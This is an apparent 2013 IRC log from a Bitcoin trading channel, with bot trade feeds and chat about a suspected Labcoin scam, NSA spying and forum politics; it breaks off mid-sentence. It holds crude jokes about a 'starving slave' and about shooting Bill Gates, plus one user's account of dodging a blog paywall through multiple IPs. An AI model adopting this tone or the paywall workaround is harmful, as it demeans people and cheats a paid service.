[BTCTC] [S] [LABCOIN] 92 @ 0.00249525 = 0.2296 BTC [+] {3} Sep 19 05:50:17 didnt you? Sep 19 05:50:19 dude. we would love to see proof that corzine did it. Sep 19 05:50:23 we all KNOW he did it. Sep 19 05:50:29 and yet... Sep 19 05:50:41 btw http://www.youtube.com/watch?v=itmNiTwHOsM Sep 19 05:50:54 [BTCTC] [S] [TAT.ASICMINER] 17 @ 0.01682 = 0.2859 BTC [+] Sep 19 05:51:01 for that matter, enron is roughly in the same position and etc. proof is hard. Sep 19 05:51:24 Nah. Sep 19 05:51:32 This isn't Enron. Sep 19 05:51:39 Or Corzine. Sep 19 05:51:46 It's a goddamm Bitcoin startup. Sep 19 05:51:58 And a shitty one at that. Sep 19 05:52:03 yes. proof even harder. Sep 19 05:52:03 I'll give that up right away. Sep 19 05:52:09 hi Edward_ Sep 19 05:52:14 Hi. Sep 19 05:52:52 everyone, this is the guy that bothered to look into that piece of malware on the forum. Edward_ this is everyone. Sep 19 05:52:56 [BTCTC] [S] [ASICMINER-PT] 1 @ 1.76 BTC [+] Sep 19 05:53:13 urlpls Sep 19 05:53:22 Funny in channel not to hear assbot chatter. Hey everyone. I look at machine code. Sep 19 05:53:28 Night all. Sep 19 05:53:36 Half OCD, half job. Sep 19 05:53:45 assbot found a girl and went away. Sep 19 05:53:55 btw you wanted a link to be calling labcoin a scam day 1 Sep 19 05:53:57 https://bitcointalk.org/index.php?topic=263445.msg2815024#msg2815024 Sep 19 05:54:03 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Sep 19 05:54:10 lol Sep 19 05:54:13 "reserved" Sep 19 05:54:17 "i told you so" ?! Sep 19 05:54:21 "last edit" :P Sep 19 05:54:21 hehe Sep 19 05:54:22 :D Sep 19 05:54:23 this could be edited afterhand Sep 19 05:54:25 :) Sep 19 05:54:30 it was Sep 19 05:54:33 url must start with log dot something Sep 19 05:54:39 lol last edited sept 12 Sep 19 05:54:40 oh I did a reserved too Sep 19 05:54:41 omg SCAM Sep 19 05:54:48 i'd have to dig up IRC logs Sep 19 05:54:49 They were taking beating last time I here. Sep 19 05:54:58 where you from Edward_ ? Sep 19 05:55:11 just wanted to be a dick to people that go back and read it Sep 19 05:55:18 Eritrea. Now live in Dubai. Sep 19 05:55:35 0.0 Sep 19 05:55:48 that's practically right next to kakobrekla's native somalia ? Sep 19 05:55:59 lmao and fu Sep 19 05:55:59 [BTCTC] [S] [LABCOIN] 300 @ 0.002499 = 0.7497 BTC [+] Sep 19 05:56:07 ha Sep 19 05:56:08 lol Sep 19 05:56:14 close, yes. Had family there. Now dont Sep 19 05:56:34 whoa that sounded like that hemingway short story. Sep 19 05:56:52 "For sale: baby shoes, never worn" Sep 19 05:56:57 Not read Hemingway. Sep 19 05:57:04 <3 Hemingway Sep 19 05:57:13 hemingway is good. Sep 19 05:57:18 six word. whole story. yes. Sep 19 05:58:10 Is kakabrekla from Somalia? Sep 19 05:58:22 its a meme Sep 19 05:58:23 well, he really is from slovenia. but he tells everyone he's from somalia Sep 19 05:58:30 like those people who pretend to be jewish. Sep 19 05:58:40 Ah. Explains much. Sep 19 05:58:44 lmao Sep 19 05:58:54 its same shit really... Sep 19 05:58:55 > 02:27.45 ( thestringpuller ) "My bank won't wire transfer to Slovenia (Bitstamp) says that it is a sanctioned country." Sep 19 05:59:20 no 419 for you kako Sep 19 05:59:30 kakobrekla https://bitcointalk.org/index.php?topic=286610.msg3146734#msg3146734 Sep 19 05:59:34 url you asked for. Sep 19 05:59:34 Mine had no problem with. But normal for Dubai, bankers no qualms about anywhere really. Sep 19 06:00:05 Edward_ so what do you normaly speak ? arabic ? Sep 19 06:00:31 thanks Sep 19 06:00:33 No. Singlish, lah? Sep 19 06:00:51 ah Sep 19 06:01:04 [BTCTC] [S] [ASICMINER-PT] 1 @ 1.751 BTC [-] Sep 19 06:02:05 [BTCTC] [S] [ASICMINER-PT] 4 @ 1.785 = 7.14 BTC [+] {2} Sep 19 06:02:22 Is Chinese syntax on about half English half Korean vocabulary. But is ugly language. Sep 19 06:02:33 she cow pig had kittens ? Sep 19 06:03:06 [BTCTC] [S] [LABCOIN] 622 @ 0.0024998 = 1.5549 BTC [+] {4} Sep 19 06:04:18 Serious Labcoin price? Thought fall further. Sep 19 06:05:08 [BTCTC] [S] [PAJKA.BOND] 33 @ 0.018 = 0.594 BTC [+] Sep 19 06:05:33 use pronouns damnit. Is assbot price of labcoin real? I thought it would fall further. Standard English? Sep 19 06:05:38 who's to know at this point. Sep 19 06:05:45 it is what btctc reports. Sep 19 06:08:26 Why do anyone think "start an anarchy" is a good idea? Sep 19 06:08:40 what does that mean ? Sep 19 06:09:12 [HAVELOCK] [S] [CBTC] 251 @ 0.0004 = 0.1004 BTC [-] {2} Sep 19 06:09:13 https://bitcointalk.org/index.php?topic=280771.0 makes a lot of nonsense to me. Sep 19 06:09:17 How to actually start an anarchy? Sep 19 06:09:34 you know the forum is mostly for comedy relief right / Sep 19 06:10:17 Hard to tell sarcasm from stupidity apart. Sep 19 06:10:49 this is what makes it so fascinating. Sep 19 06:11:58 " Sep 19 06:11:59 You don't start an anarchy. They naturally arise after revolution." Sep 19 06:12:24 " Does things high level compiler never ever do like use as data (including instructions!) from code segment, to make value pun elsewhere, use as number or insert in string. Horrible to trace, damned clever." << this by the way was very funny, because of the word pun is afaik never used before in that context. Sep 19 06:12:30 Edward_ you know the story of mel ? Sep 19 06:12:50 I would say after infrastructure destroyed. Is worst part of war, anarchy follows. Sep 19 06:13:01 From Hacker Dictionary? Sep 19 06:13:05 yes. Sep 19 06:13:18 Yes. What word if not 'pun'? Sep 19 06:13:29 anyway. what you think of anarchy, ie, proper anarchy, and what pasty ass white boys imagine anarchy is are very VERY different things. Sep 19 06:13:55 when you hear white rich people talk about anarchy all they mean is, our governments have become very large, very expensive, very ineffectual and very stupid. people want to get rid of them. Sep 19 06:14:09 no, no, pun is great. it just never occured to anyone before. Sep 19 06:14:30 America Government is not ineffectual. It is so effectual it is scary. Sep 19 06:14:39 how do you judge ? Sep 19 06:15:18 [BTCTC] [S] [TAT.ASICMINER] 57 @ 0.01733 = 0.9878 BTC [+] Sep 19 06:15:22 anarchy ≠ anomy Sep 19 06:15:50 revolutions, wars have actually usually kept the existing bureaucracies and made them more powerful Sep 19 06:16:30 NSA headlines lately. No other government could do what they did. Listening to whole world. Sep 19 06:17:00 that is irrelevant for most people. ineffectual in this context means they don't do what people want them to do, not that they don't do what they themselves set out to do. Sep 19 06:17:22 what's the NSA's budget? Sep 19 06:17:41 $billions. I don't know. Sep 19 06:18:21 [BTCTC] [S] [TAT.ASICMINER] 15 @ 0.0173 = 0.2595 BTC [-] Sep 19 06:18:47 i bet you you could do what they do on half the money :D Sep 19 06:19:08 Is just example. American government does many things no other could do. Invade Syria? You know how tough Syria is? Nobody else would even think. Sep 19 06:19:30 they're just talking about it. Sep 19 06:19:34 tjhey know they'll get owned. Sep 19 06:20:09 I have no doubt they could flatten it. But after? No way to disengage, Sep 19 06:20:59 well exactly. Sep 19 06:21:12 what win is that ? another afghanistan. Sep 19 06:21:31 spend 10 trillion to do 10 billion worth of damage. whoopdedoo. Sep 19 06:21:42 russians send 10 more bn worth of gear, start over in 10 years. Sep 19 06:24:24 America, always being police to the world. But sometimes corrupt police like in India. Sep 19 06:25:05 Less about chasing crooks than shaking them down for share of profits. Sep 19 06:25:57 "thanks the cops who put greed before the badge" Sep 19 06:26:02 or knocking them down and placing their own crooks Sep 19 06:26:29 [BTCTC] [S] [BASIC-MINING] 4 @ 0.1244 = 0.4976 BTC [+] {2} Sep 19 06:27:30 [BTCTC] [S] [TAT.ASICMINER] 50 @ 0.017 = 0.85 BTC [-] Sep 19 06:28:02 But like Batman thing. Spend $Millions on equipment, chase crooks who mug $50 from old lady on corner. Sep 19 06:28:31 [BTCTC] [S] [BASIC-MINING] 16 @ 0.1244 = 1.9904 BTC [+] {2} Sep 19 06:28:52 Then ignore other crooks do much worse when no oil involved. Sep 19 06:29:33 [BTCTC] [S] [LABCOIN] 280 @ 0.002591 = 0.7255 BTC [+] {2} Sep 19 06:31:24 Trading is much calmer today? Sep 19 06:31:27 thus ineffectual :) Sep 19 06:31:57 Hardly. Nobody else can do so much damage so fast. Sep 19 06:33:59 well we'll just have to agree to disagree :) Sep 19 06:34:02 also, check pms. Sep 19 06:34:37 private message on bitcointalk board? Sep 19 06:35:39 [BTCTC] [FN] [DMS.SELLING] 500 @ 0.00689359 = 3.4468 BTC [+] {3} Sep 19 06:35:39 [BTCTC] [S] [ASICMINER-PT] 2 @ 1.7855 = 3.571 BTC [+] {2} Sep 19 06:35:46 no, here. Sep 19 06:36:30 Sorry, new to IRC. How? Sep 19 06:36:59 should be a tab up on the screen Sep 19 06:40:00 Edward_ the trades are merged in 1 min blocks and nothing under 0.01 comes through, hence less spam Sep 19 06:40:25 0.1 that is Sep 19 06:41:58 I see. Sep 19 06:45:49 [BTCTC] [S] [TAT.ASICMINER] 36 @ 0.01731333 = 0.6233 BTC [+] {2} Sep 19 06:47:51 [BTCTC] [S] [LABCOIN] 100 @ 0.0025115 = 0.2512 BTC [-] {2} Sep 19 06:49:53 [BTCTC] [S] [ASICMINER-PT] 6 @ 1.79116666 = 10.747 BTC [+] {3} Sep 19 06:53:57 [HAVELOCK] [B] [XBOND] 344 @ 0.00119752 = 0.4119 BTC [-] {4} Sep 19 06:54:59 [BTCTC] [S] [ACTIVEMINING] 40 @ 0.002565 = 0.1026 BTC [-] Sep 19 06:58:01 [BTCTC] [S] [LABCOIN] 250 @ 0.002502 = 0.6255 BTC [-] Sep 19 06:58:09 TheSeven, save us from the TheScam Sep 19 06:58:31 dexxy posted a respone from theseven today in that thread Sep 19 06:58:45 er dexx7 Sep 19 06:59:01 did it amount to "I wont say it's NOT a scam..."? Sep 19 06:59:53 he said he's sure it's not a scam from what he's seen, but anything's possible, he also confirmed consulting and seeing his ideas being implemented in the 65nm design Sep 19 06:59:58 i'll try to find it Sep 19 07:01:04 [HAVELOCK] [S] [AM1] 1 @ 1.6002 BTC [-] Sep 19 07:01:05 [BTCTC] [S] [ASICMINER-PT] 3 @ 1.798 = 5.394 BTC [+] {2} Sep 19 07:01:41 bitcointalk so slow for me atm Sep 19 07:01:55 same Sep 19 07:02:05 [BTCTC] [S] [ASICMINER-PT] 1 @ 1.809 BTC [+] Sep 19 07:02:54 https://bitcointalk.org/index.php?topic=263445.msg3181860#msg3181860 Sep 19 07:03:00 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Sep 19 07:08:03 that thread is posted in way too much Sep 19 07:09:06 Its amazing how much can be written and so little said Sep 19 07:09:07 AMAZING COMPANY! Sep 19 07:09:13 haha Sep 19 07:09:55 Big bubble ? :p Sep 19 07:10:13 [BTCTC] [S] [LABCOIN] 42 @ 0.002505 = 0.1052 BTC [+] Sep 19 07:10:17 could probly end world hunger with the wasted effort in that forum Sep 19 07:11:08 if anyone ever ends world hunger i'll be a sad panda. Sep 19 07:11:27 internet* Sep 19 07:12:59 but a well-fed panda at least Sep 19 07:14:22 yeah, right, because im totally starving right now. Sep 19 07:14:56 anyway, if some schmuck ends world hunger i will have a starving slave in my basement at all time. the girls can rotate fasting weekly or w/e. Sep 19 07:15:12 whoever heard of a skinny Santa?! Sep 19 07:16:24 just have Bill Gates shot that should cover your lifetime of risk Sep 19 07:18:21 [BTCTC] [S] [TAT.ASICMINER] 50 @ 0.0168 = 0.84 BTC [-] Sep 19 07:20:18 lol Sep 19 07:21:08 http://72.10.171.98/resources/ecommerce/images/products/966/710/img710966/product-enlarged.jpg Sep 19 07:21:11 she's reasonably skinny. Sep 19 07:24:27 [BTCTC] [S] [TAT.ASICMINER] 22 @ 0.01664 = 0.3661 BTC [-] Sep 19 07:25:28 [MPEX] [S] [S.MPOE] 2152 @ 0.00091356 = 1.966 BTC [+] {2} Sep 19 07:26:29 [BTCTC] [S] [LABCOIN] 1379 @ 0.00250484 = 3.4542 BTC [-] {3} Sep 19 07:27:47 https://lh4.googleusercontent.com/-2xgOW7LUElI/UirijXfIYuI/AAAAAAAAi8A/tCGK89EOjR8/%23vuc+-+freenode+Web+IRC.png Sep 19 07:27:54 posting this here to have for later in case noobs. Sep 19 07:29:32 [BTCTC] [S] [TAT.ASICMINER] 47 @ 0.01662 = 0.7811 BTC [-] Sep 19 07:29:39 but where do o see pm's? Sep 19 07:29:42 i Sep 19 07:31:42 same as chans Sep 19 07:32:35 [BTCTC] [S] [ASICMINER-PT] 1 @ 1.809 BTC [+] Sep 19 07:36:39 [BTCTC] [S] [TAT.ASICMINER] 25 @ 0.016518 = 0.413 BTC [-] {2} Sep 19 07:36:39 [BTCTC] [S] [LTC-ATF.B2] 105 @ 0.01098285 = 1.1532 BTC [+] {2} Sep 19 07:36:39 [BTCTC] [S] [ASICMINER-PT] 21 @ 1.80971428 = 38.004 BTC [+] {3} Sep 19 07:37:40 [BTCTC] [S] [TAT.ASICMINER] 18 @ 0.01652 = 0.2974 BTC [+] Sep 19 07:37:40 [BTCTC] [S] [CIPHERMINE-PT] 3 @ 0.056 = 0.168 BTC [+] Sep 19 07:38:41 [BTCTC] [S] [CIPHERMINE-PT] 9 @ 0.05788888 = 0.521 BTC [+] {2} Sep 19 07:42:45 [BTCTC] [S] [LABCOIN] 479 @ 0.00259289 = 1.242 BTC [+] {2} Sep 19 07:46:49 [BTCTC] [S] [LABCOIN] 161 @ 0.002599 = 0.4184 BTC [+] **** BEGIN LOGGING AT Thu Sep 19 12:07:05 2013 Sep 19 12:08:11 [BTCTC] [S] [TAT.ASICMINER] 122 @ 0.0177799 = 2.1691 BTC [+] {4} Sep 19 12:12:15 [BTCTC] [S] [LABCOIN] 2093 @ 0.00273772 = 5.73 BTC [+] {6} Sep 19 12:15:18 [BTCTC] [S] [ASICMINER-PT] 2 @ 1.944 = 3.888 BTC [+] Sep 19 12:31:34 [BTCTC] [S] [ASICMINER-PT] 2 @ 1.851 = 3.702 BTC [-] Sep 19 12:36:38 [BTCTC] [S] [ASICMINER-PT] 3 @ 1.85066666 = 5.552 BTC [-] {2} Sep 19 12:49:51 [BTCTC] [S] [ACTIVEMINING] 381 @ 0.0025819 = 0.9837 BTC [-] {3} Sep 19 12:50:52 [BTCTC] [S] [ACTIVEMINING] 161 @ 0.002556 = 0.4115 BTC [-] Sep 19 13:02:04 [BTCTC] [S] [TAT.ASICMINER] 6 @ 0.017225 = 0.1034 BTC [-] {2} Sep 19 13:07:08 [BTCTC] [S] [LABCOIN] 2086 @ 0.00279668 = 5.8339 BTC [+] {4} Sep 19 13:17:19 [BTCTC] [S] [LABCOIN] 16050 @ 0.00282866 = 45.4 BTC [+] {8} Sep 19 13:18:19 [BTCTC] [S] [LABCOIN] 900 @ 0.00283545 = 2.5519 BTC [+] {2} Sep 19 13:21:23 [BTCTC] [S] [LABCOIN] 81 @ 0.002836 = 0.2297 BTC [+] Sep 19 13:23:25 [MPEX] [S] [S.MPOE] 2198 @ 0.00092065 = 2.0236 BTC [+] Sep 19 13:25:28 [BTCTC] [S] [LABCOIN] 300 @ 0.00288 = 0.864 BTC [+] Sep 19 13:27:29 [BTCTC] [S] [LABCOIN] 170 @ 0.00288 = 0.4896 BTC [+] Sep 19 13:28:30 [BTCTC] [S] [LABCOIN] 1816 @ 0.00288575 = 5.2405 BTC [+] {3} Sep 19 13:30:33 [BTCTC] [S] [LABCOIN] 1219 @ 0.00289808 = 3.5328 BTC [+] {3} Sep 19 13:32:34 [BTCTC] [S] [LABCOIN] 3655 @ 0.00292156 = 10.6783 BTC [+] {5} Sep 19 13:33:35 [BTCTC] [S] [LABCOIN] 1001 @ 0.00294997 = 2.9529 BTC [+] {2} Sep 19 13:34:36 [BTCTC] [S] [LABCOIN] 310 @ 0.002925 = 0.9068 BTC [-] {2} Sep 19 13:35:37 [BTCTC] [S] [TAT.ASICMINER] 40 @ 0.01777 = 0.7108 BTC [+] {2} Sep 19 13:36:38 [HAVELOCK] [S] [HIM] 42 @ 0.18171428 = 7.632 BTC [-] {5} Sep 19 13:39:41 [BTCTC] [S] [DMS.MINING] 300 @ 0.002354 = 0.7062 BTC [-] Sep 19 13:41:43 [BTCTC] [S] [LABCOIN] 690 @ 0.00294886 = 2.0347 BTC [+] {2} Sep 19 13:42:44 [BTCTC] [FN] [DMS.SELLING] 100 @ 0.00704229 = 0.7042 BTC [+] {6} Sep 19 13:44:46 [BTCTC] [S] [TAT.ASICMINER] 200 @ 0.01785224 = 3.5704 BTC [+] {4} **** ENDING LOGGING AT Thu Sep 19 14:04:15 2013 **** BEGIN LOGGING AT Thu Sep 19 14:04:41 2013 Sep 19 14:08:03 i dont even comment in there anymore Sep 19 14:08:13 just asking for frustration Sep 19 14:12:05 http://www.zdnet.com/pay-heed-to-the-internets-third-wave-cows-of-disruption-7000020878/ Sep 19 14:12:09 Pay heed to the internet's Third Wave Cows of Disruption | ZDNet Sep 19 14:12:41 i totally <3 this. if you argue with someone that bitcoin is useless in meatspace Sep 19 14:12:47 send them to read this Sep 19 14:14:14 [HAVELOCK] [B] [XBOND] 269 @ 0.00116689 = 0.3139 BTC [-] {5} Sep 19 14:15:15 [HAVELOCK] [B] [XBOND] 393 @ 0.00116002 = 0.4559 BTC [-] {2} Sep 19 14:16:16 [HAVELOCK] [B] [XBOND] 172 @ 0.00114487 = 0.1969 BTC [-] {5} Sep 19 14:18:18 [HAVELOCK] [S] [CBTC] 2231 @ 0.0004482 = 0.9999 BTC [+] Sep 19 14:24:24 [BTCTC] [S] [LABCOIN] 600 @ 0.002804 = 1.6824 BTC [-] Sep 19 14:25:25 [BTCTC] [S] [LABCOIN] 400 @ 0.002804 = 1.1216 BTC [-] Sep 19 14:27:27 [BTCTC] [S] [LABCOIN] 1550 @ 0.00299049 = 4.6353 BTC [+] {2} Sep 19 14:28:09 https://bitcointalk.org/index.php?topic=125629.msg3188684#msg3188684 Sep 19 14:28:15 [BTC-TC] Virtual Community Exchange w/ Options, DRIP, 2FA, API, CSV, etc. Sep 19 14:29:26 Diablo-D3: yeah there's this one guy who just quotes huge posts saying "I have to agree here.", very annoying :) Sep 19 14:31:30 inputs.io pays the fee for you when you sweep a private key Sep 19 14:31:40 good to know for collecting dust :) Sep 19 14:36:36 [BTCTC] [S] [LABCOIN] 87 @ 0.002989 = 0.26 BTC [-] Sep 19 14:37:37 [BTCTC] [S] [LABCOIN] 400 @ 0.00299 = 1.196 BTC [+] Sep 19 14:38:38 [BTCTC] [S] [LABCOIN] 50 @ 0.00299 = 0.1495 BTC [+] Sep 19 14:40:40 [BTCTC] [S] [TAT.ASICMINER] 41 @ 0.0179 = 0.7339 BTC [+] Sep 19 14:41:41 [BTCTC] [S] [LABCOIN] 340 @ 0.002989 = 1.0163 BTC [-] Sep 19 14:42:42 [BTCTC] [S] [TAT.ASICMINER] 31 @ 0.01790064 = 0.5549 BTC [+] {2} Sep 19 14:53:54 [BTCTC] [S] [LABCOIN] 104 @ 0.00298457 = 0.3104 BTC [-] {2} Sep 19 15:00:00 [HAVELOCK] [XBOND] [PAID] 0.72977550 BTC to 1`459`551 shares, 50 satoshi per share Sep 19 15:07:07 [BTCTC] [S] [ET.DIFF.LONG] 45 @ 0.0127 = 0.5715 BTC [+] Sep 19 15:08:08 [BTCTC] [S] [LABCOIN] 125 @ 0.00298774 = 0.3735 BTC [+] {2} Sep 19 15:11:11 [HAVELOCK] [B] [XBOND] 100 @ 0.00128 = 0.128 BTC [-] Sep 19 15:11:12 [BTCTC] [S] [ACTIVEMINING] 411 @ 0.00260097 = 1.069 BTC [+] {3} Sep 19 15:12:12 [BTCTC] [S] [ACTIVEMINING] 2189 @ 0.00251188 = 5.4985 BTC [-] {7} Sep 19 15:12:12 [BTCTC] [S] [ESECURITYSABTC] 2 @ 0.2111 = 0.4222 BTC [-] Sep 19 15:14:14 [BTCTC] [S] [LABCOIN] 165 @ 0.002987 = 0.4929 BTC [-] Sep 19 15:18:18 [BTCTC] [S] [TAT.ASICMINER] 15 @ 0.0175 = 0.2625 BTC [-] Sep 19 15:19:19 [BTCTC] [S] [ACTIVEMINING] 6275 @ 0.00247649 = 15.54 BTC [-] {15} Sep 19 15:19:19 [BTCTC] [S] [TAT.ASICMINER] 12 @ 0.01723 = 0.2068 BTC [-] Sep 19 15:20:20 [BTCTC] [S] [ACTIVEMINING] 3725 @ 0.00240821 = 8.9706 BTC [-] {5} Sep 19 15:29:29 [BTCTC] [S] [TAT.ASICMINER] 8 @ 0.01743 = 0.1394 BTC [+] Sep 19 15:34:05 ;;nethash Sep 19 15:34:06 993830.229432 Sep 19 15:35:34 [BTCTC] [S] [LABCOIN] 362 @ 0.00282211 = 1.0216 BTC [-] {2} Sep 19 15:37:36 [BTCTC] [S] [ACTIVEMINING] 130 @ 0.0025 = 0.325 BTC [+] Sep 19 15:39:38 [BTCTC] [S] [ACTIVEMINING] 570 @ 0.00240908 = 1.3732 BTC [-] {3} Sep 19 15:40:39 [BTCTC] [S] [COGNITIVE] 6 @ 0.185 = 1.11 BTC [+] {3} Sep 19 15:41:40 [HAVELOCK] [B] [XBOND] 153 @ 0.00128 = 0.1958 BTC [-] Sep 19 15:44:43 [BTCTC] [S] [LABCOIN] 42 @ 0.002823 = 0.1186 BTC [+] Sep 19 15:45:44 [BTCTC] [S] [LABCOIN] 134 @ 0.002822 = 0.3781 BTC [-] {2} Sep 19 15:52:51 [BTCTC] [S] [ACTIVEMINING] 5000 @ 0.00231936 = 11.5968 BTC [-] {13} Sep 19 16:00:25 https://bitcointalk.org/index.php?topic=290007.msg3160495#msg3160495 Sep 19 16:00:27 O_O Sep 19 16:00:49 Advertise on this forum - Round 96 Sep 19 16:03:16 wow Sep 19 16:03:53 dont worry, its all going to new forum software Sep 19 16:04:02 larry ellison himself has been contracted to write it Sep 19 16:12:10 [BTCTC] [S] [LABCOIN] 591 @ 0.0029562 = 1.7471 BTC [-] {3} Sep 19 16:12:11 [HAVELOCK] [B] [XBOND] 140 @ 0.00128019 = 0.1792 BTC [-] {2} Sep 19 16:13:13 [BTCTC] [S] [LABCOIN] 458 @ 0.00295963 = 1.3555 BTC [+] {2} Sep 19 16:13:20 lol at theymos endorsement in sig... Sep 19 16:16:14 [BTCTC] [S] [LABCOIN] 840 @ 0.002955 = 2.4822 BTC [-] Sep 19 16:16:21 woah 27 btc for a weeklong ad? Sep 19 16:16:32 thats per slot too i think Sep 19 16:16:38 7x Sep 19 16:16:38 2 months ago people were laughing over 8btc bets Sep 19 16:16:40 7*27 Sep 19 16:16:56 advertising bubble? Sep 19 16:16:56 ;;calc 7*27 Sep 19 16:16:56 189 Sep 19 16:17:16 [BTCTC] [S] [LABCOIN] 99 @ 0.002954 = 0.2924 BTC [-] Sep 19 16:17:19 ;;ticker Sep 19 16:17:19 MtGox BTCUSD ticker | Best bid: 138.26600, Best ask: 138.50994, Bid-ask spread: 0.24394, Last trade: 138.26600, 24 hour volume: 9077.95048415, 24 hour low: 138.01001, 24 hour high: 142.00000, 24 hour vwap: 139.81938 Sep 19 16:17:39 $avg Sep 19 16:17:41 ThickAsThieves: 131.23 Sep 19 16:19:18 [BTCTC] [S] [LABCOIN] 61 @ 0.002954 = 0.1802 BTC [-] Sep 19 16:19:18 [BTCTC] [S] [ASICMINER-PT] 25 @ 1.81791998 = 45.448 BTC [-] {10} Sep 19 16:22:21 [BTCTC] [S] [TAT.ASICMINER] 30 @ 0.01737266 = 0.5212 BTC [-] {3} Sep 19 16:23:22 [HAVELOCK] [S] [AM100] 100 @ 0.0168141 = 1.6814 BTC [-] {6} Sep 19 16:24:23 [BTCTC] [S] [LABCOIN] 240 @ 0.002925 = 0.702 BTC [-] Sep 19 16:29:28 [BTCTC] [S] [ASICMINER-PT] 3 @ 1.812 = 5.436 BTC [-] {3} Sep 19 16:32:31 [BTCTC] [S] [FIMB] 125 @ 0.010988 = 1.3735 BTC [-] {2} Sep 19 16:37:36 [BTCTC] [S] [ASICMINER-PT] 1 @ 1.812 BTC [-] Sep 19 16:41:40 [BTCTC] [S] [ASICMINER-PT] 60 @ 1.81023333 = 108.614 BTC [-] {4} Sep 19 16:41:40 [BTCTC] [S] [LABCOIN] 3381 @ 0.00279881 = 9.4628 BTC [-] {7} **** ENDING LOGGING AT Thu Sep 19 16:43:47 2013 **** BEGIN LOGGING AT Thu Sep 19 16:44:27 2013 Sep 19 16:48:47 [BTCTC] [S] [LABCOIN] 560 @ 0.00280214 = 1.5692 BTC [+] {2} Sep 19 16:59:57 [HAVELOCK] [S] [AM100] 8 @ 0.01781 = 0.1425 BTC [-] Sep 19 17:04:01 [BTCTC] [S] [LABCOIN] 500 @ 0.002879 = 1.4395 BTC [+] Sep 19 17:17:14 [BTCTC] [FN] [DMS.PURCHASE] 420 @ 0.009322 = 3.9152 BTC [-] Sep 19 17:22:19 [BTCTC] [S] [LABCOIN] 1420 @ 0.00285 = 4.047 BTC [-] Sep 19 17:22:43 http://rinf.com/alt-news/latest-news/the-brics-independent-internet-in-defiance-of-the-us-centric-internet/70569/ Sep 19 17:22:58 and in other news, Sep 19 17:22:59 http://www.spiegel.de/international/europe/nsa-spying-european-parliamentarians-call-for-swift-suspension-a-922920.html Sep 19 17:23:03 NSA Spying: European Parliamentarians Call for SWIFT Suspension - SPIEGEL ONLINE Sep 19 17:30:27 [BTCTC] [S] [ASICMINER-PT] 1 @ 1.881 BTC [+] Sep 19 17:32:29 [BTCTC] [S] [LABCOIN] 2875 @ 0.00278246 = 7.9996 BTC [-] {4} Sep 19 17:36:33 [BTCTC] [S] [ASICMINER-PT] 2 @ 1.8105 = 3.621 BTC [-] {2} Sep 19 17:36:34 [HAVELOCK] [S] [CBTC] 562 @ 0.00044828 = 0.2519 BTC [+] {2} Sep 19 17:38:35 [HAVELOCK] [S] [CBTC] 450 @ 0.00044829 = 0.2017 BTC [+] Sep 19 17:38:46 ;;ticker Sep 19 17:38:46 MtGox BTCUSD ticker | Best bid: 138.11001, Best ask: 138.49998, Bid-ask spread: 0.38997, Last trade: 138.11000, 24 hour volume: 8505.19998371, 24 hour low: 138.01001, 24 hour high: 142.00000, 24 hour vwap: 139.70247 Sep 19 17:40:37 [HAVELOCK] [S] [AM1] 2 @ 1.9 = 3.8 BTC [+] Sep 19 17:44:43 [BTCTC] [S] [LABCOIN] 6970 @ 0.00275625 = 19.2111 BTC [-] {5} Sep 19 17:45:42 [BTCTC] [S] [LABCOIN] 180 @ 0.002752 = 0.4954 BTC [-] Sep 19 17:57:08 ;;premium mtgox bitstamp Sep 19 17:57:14 mtgox premium over bitstamp is currently 9.6171344983 %. Sep 19 18:05:02 [HAVELOCK] [B] [XBOND] 200 @ 0.00128 = 0.256 BTC [-] Sep 19 18:05:44 lol Diablo-D3 Sep 19 18:14:04 pankkake no actually, inaba put like 500 btc on the original bfl delivery bet. Sep 19 18:14:12 then got all butthurt when he couldn't have it back. Sep 19 18:14:22 cool Sep 19 18:14:41 http://www.cryptogon.com/?p=37041 Sep 19 18:14:44 cryptogon.com » Torvalds On Being Asked to Insert a U.S. Government Back Door Into Linux Kernel Sep 19 18:14:56 this better be with bird flips in it Sep 19 18:15:12 [BTCTC] [S] [LABCOIN] 12516 @ 0.00263352 = 32.9611 BTC [-] {18} Sep 19 18:16:13 [BTCTC] [S] [LABCOIN] 920 @ 0.00259804 = 2.3902 BTC [-] {2} Sep 19 18:17:14 [BTCTC] [S] [LABCOIN] 537 @ 0.002597 = 1.3946 BTC [-] Sep 19 18:17:34 wait, benkay doesn;'t have trilema subscription ?! when did that occur. Sep 19 18:17:39 this log is trippy. Sep 19 18:17:54 When the complimentary trilema subscriptions expired. Sep 19 18:18:27 they don't expire and what complimentary Sep 19 18:18:31 what is this, sweden ?! Sep 19 18:18:40 lol Sep 19 18:19:10 mircea_popescu: perhaps 'complimentary' means TOR Sep 19 18:19:26 hehe I was going to say that :p Sep 19 18:19:31 isn't that comprodisentery ? Sep 19 18:19:51 I had to set the cookie again today though - not sure why Sep 19 18:19:54 jesus what a punfest. copromisery. etc. Sep 19 18:20:45 pankkake i vaguely recall they having an expiration date to protect people from the random "i visited my ex wife in missisiauga and loaded my cookie in the library computer. so now 57969543489 ppl use it" Sep 19 18:22:02 why isn't subscribing etc. automated anyway? Sep 19 18:24:09 basically because i'm lazy. Sep 19 18:26:19 well, you're likely missing a lot of subscribers - for me it was actually easier to use other IPs Sep 19 18:27:41 so even if I wanted to pay, the lazy route was to cheat Sep 19 18:28:03 hmm actually there might be an even better way to cheat :p Sep 19 18:28:04 i don't care, the ips you use to cheat can't be used by others to cheat. Sep 19 18:28:40 moreover, considering what it icosts, if cheating is time effective then i guess you weren't in the target anyway. Sep 19 18:29:15 cheating is basically using ssh + lynx. I have ~10 IPs at hand at least Sep 19 18:29:37 how much do they cost ? Sep 19 18:29:59 it's sunk cost - they all have their uses Sep 19 18:30:31 yeah well, 10 ips + 15 minutes of computer engineer time to set it all up, 100 dollars. Sep 19 18:30:41 (or I'm not paying, just happen to have ssh access) Sep 19 18:30:43 could have had like 100k credits for the that. Sep 19 18:30:48 yes, but that doesn't make it free. Sep 19 18:31:09 just because i have an apple in front of my window doesn't make the apple i eat off that tree not worth 1/4 euro or w/e thery sell for. Sep 19 18:31:30 but I didn't set them up for it; I simply have them for other uses Sep 19 18:31:48 sooo ? Sep 19 18:32:10 so whether I cheat or not, I do not pay more Sep 19 18:32:22 not nominally. Sep 19 18:32:41 actually paying was a burden for me: I had to talk to you! and I dislike asking people stuff Sep 19 18:32:59 so your impending desocialisation suffered a setback :D Sep 19 18:33:10 yeah Sep 19 18:33:36 I order everything through machines, except food Sep 19 18:34:29 pankkake what? you had to telephone mirce or 